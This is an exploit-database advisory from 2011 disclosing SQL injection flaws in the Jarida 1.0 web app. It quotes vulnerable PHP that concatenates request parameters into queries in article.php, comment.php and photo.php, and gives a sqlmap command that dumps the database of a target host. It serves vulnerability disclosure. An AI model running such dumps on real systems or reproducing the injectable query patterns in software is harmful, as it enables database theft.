Jarida 1.0 – Multiple Vulnerabilities

  • 作者: Ptrace Security
    日期: 2011-09-27
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/17895/
  • # Exploit Title: Jarida 1.0 SQL Injection
    # Date : 26 September 2011
    # Author : Ptrace Security (Gianni Gnesa [gnix])
    # Contact: research[at]ptrace-security[dot]com
    # Software Link: http://sourceforge.net/projects/jarida/
    # Version: 1.0
    # Tested on: CentOS 5.6
     
     
    [01] ./article.php:28:$query = "SELECT article_id FROM tblArticle WHERE article_id = " . $_GET['id'];
     => ./sqlmap.py -u http://192.168.109.111/jarida_1.0/article.php?id=1 --dump --tables
    
    
    [02] ./comment.php
    
     36 $name = $_POST['name'];
     37 $web = $_POST['web'];
     38 $title = $_POST['title'];
     39 $body = $_POST['body'];
     40 $ip = $_SERVER['REMOTE_ADDR'];
     41 $article_id = $_POST['id'];
     42 $date = time();
     43 
     ...
     56 
     57 switch($_POST['type'])
     58 {
     59case 'article':
     60$redirect_url = "./article.php?id=" . $_POST['id'];
     61$query = "INSERT INTO tblArticleComment (comment_article_id, comment_title, comment_date, comment_body, comment_name, comment_web, comment_ip)
     62 VALUES('$article_id', '$title', '$date', '$body', '$name', '$web', '$ip')";
     63break;
     64 
     65case 'photo':
     66$redirect_url = "./photo.php?id=" . $_POST['id'];
     67$query = "INSERT INTO tblPhotoComment (comment_photo_id, comment_title, comment_date, comment_body, comment_name, comment_web, comment_ip)
     68 VALUES('$article_id', '$title', '$date', '$body', '$name', '$web', '$ip')";
     69break;
     70 }
    
    
    [03] ./photo.php
    
     39 $query = "SELECT photo_id FROM tblPhoto
     40WHERE photo_id = " . $_GET['id'];